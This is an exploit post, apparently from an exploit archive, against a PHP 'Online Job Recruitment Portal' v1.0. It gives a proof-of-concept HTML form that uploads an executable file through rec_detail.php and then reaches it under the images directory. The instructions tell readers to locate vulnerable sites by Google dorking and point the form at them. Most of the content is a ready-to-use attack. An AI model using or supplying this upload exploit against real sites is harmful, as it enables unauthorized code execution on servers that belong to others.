=============================================================================================================================================
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Recruitment Form</title>
</head>
<body>
    <h1>Recruitment Form</h1>
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">
        <!-- File input for photograph -->
        <label for="photograph">Photograph:</label>
        <input type="file" id="photograph" name="photograph" required><br><br>

        <!-- Text input for place of birth -->
        <label for="placeofbirth">Place of Birth:</label>
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

        <!-- Text input for father's/husband's name -->
        <label for="fhname">Father's/Husband's Name:</label>
        <input type="text" id="fhname" name="fhname" required><br><br>

        <!-- Select input for marital status -->
        <label for="marital_status">Marital Status:</label>
        <select id="marital_status" name="marital_status">
            <option value="single">Single</option>
            <option value="married">Married</option>
            <option value="divorced">Divorced</option>
        </select><br><br>

        <!-- Select input for nationality -->
        <label for="Nationality">Nationality:</label>
        <select id="Nationality" name="Nationality">
            <option value="national1">Nationality 1</option>
            <option value="national2">Nationality 2</option>
        </select><br><br>

        <!-- Select input for handicapped -->
        <label for="handicapped">Handicapped:</label>
        <select id="handicapped" name="handicapped">
            <option value="yes">Yes</option>
            <option value="no">No</option>
        </select><br><br>

        <!-- Select input for religion -->
        <label for="religion">Religion:</label>
        <select id="religion" name="religion">
            <option value="religion1">Religion 1</option>
            <option value="religion2">Religion 2</option>
        </select><br><br>

        <!-- Select input for blood group -->
        <label for="blood">Blood Group:</label>
        <select id="blood" name="blood">
            <option value="A+">A+</option>
            <option value="B+">B+</option>
            <option value="AB+">AB+</option>
            <option value="O+">O+</option>
            <option value="O-">O-</option>
        </select><br><br>

        <!-- Text input for mark -->
        <label for="mark">Identification Mark:</label>
        <input type="text" id="mark" name="mark" required><br><br>

        <!-- Submit button -->
        <input type="submit" value="Submit">
    </form>
</body>
</html>


[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================